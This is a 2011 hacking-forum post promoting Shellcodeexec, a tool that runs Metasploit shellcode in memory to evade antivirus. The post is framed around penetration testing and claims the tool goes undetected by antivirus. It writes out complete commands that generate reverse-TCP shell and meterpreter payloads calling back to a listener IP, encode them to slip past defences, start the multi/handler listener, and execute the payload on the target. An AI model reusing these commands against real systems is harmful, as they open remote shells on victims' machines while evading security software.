:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Tools forum (http://www.vbspiders.com/vb/forumdisplay.php?f=279)
-   -   Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot (http://www.vbspiders.com/vb/showthread.php?t=46574)

hitman-zone 04-22-2011 03:47 AM
Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot
 
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:
  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
1
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Or for a Windows target:
1
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
1
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

http://www.burstnet.com/cgi-bin/ads/...3S/sz=468x60B/
Or for a Windows target:
1
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E



3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
1
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>



Or, on the Windows target:
1
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>



Download shellcodeexec (inquisb-shellcodeexec.zip) here.


ÇáÓÇÚÉ ÇáÂä 03:26 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0